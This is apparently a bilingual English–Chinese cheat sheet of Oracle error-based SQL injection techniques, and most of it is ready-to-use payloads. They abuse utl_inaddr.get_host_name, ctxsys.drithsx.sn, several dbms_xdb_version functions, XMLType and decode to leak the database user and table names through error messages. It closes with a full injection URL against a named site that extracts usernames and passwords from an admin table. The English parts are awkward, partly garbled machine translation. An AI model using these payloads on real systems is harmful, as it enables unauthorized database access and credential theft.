0X01
Similar use of error injection requires 1 = [error statement] 1> [given statement], using comparison, injection being given such a manner (using MYSQL Based can only function being given), the injection being given mssql similar manner.
news.jsp? the above mentioned id = 1 and 1 = 1 correctly news.jsp ? the above mentioned id = 1 and 1 = 2 errors
There is injected just found an input error information we can try to inject an error
0X02 error injection function
utl_inaddr.get_host_name () for error injection
and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1))
utl_inaddr.get_host_address intention is to obtain ip address, but if you pass a parameter can not be resolved will return an oracle error and display parameters passed.
Our message is the result of a sql statement so the return statement is executed. After starting the oracle, some system variables are placed among some specific view, you can use these views to get something you want. There are usually very important information
0x002 ctxsys.drithsx.sn () for error injection
?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))
0x03 use dbms_xdb_version.checkin ()
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
0x04dbms_xdb_version.makeversioned()
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
0x05dbms_xdb_version.uncheckout()
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not nul
0x06dbms_utility.sqlid_to_sqlhash()
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
0x06ordsys.ord_dicom.getmappingxpath()
and 1=ordsys.ord_dicom.getmappingxpath((select table_name from user_tables where rownum=1))
0x07decode进行报错注入因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。
and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) 匹配到正确的时候页面返回错误
?id=1 and 1=(select decode(substr(user,1,1),'s',(1/0),0) from dual)
0x08XMLType在使用这个XMLType进行报错时,很多人不知道为什么要用chr(60),通过ascii查询可以看到,60:<,58:’:’,62:’>’,查了下相关的api,发现xmltype在进行解析的时候必须以<开头>结尾,这里:冒号在这是必不可少的,至于为什么是冒号这个我也没查到,另外需要注意的是如果返回的数据种有空格的话,它会自动截断,导致数据不完整,有replace函数替换成其他非空字符就可以
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null
0X020x02 报错函数注入数据
报错admin表的 用户和密码
http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))--
其他报错函数差不多
by 感谢卿哥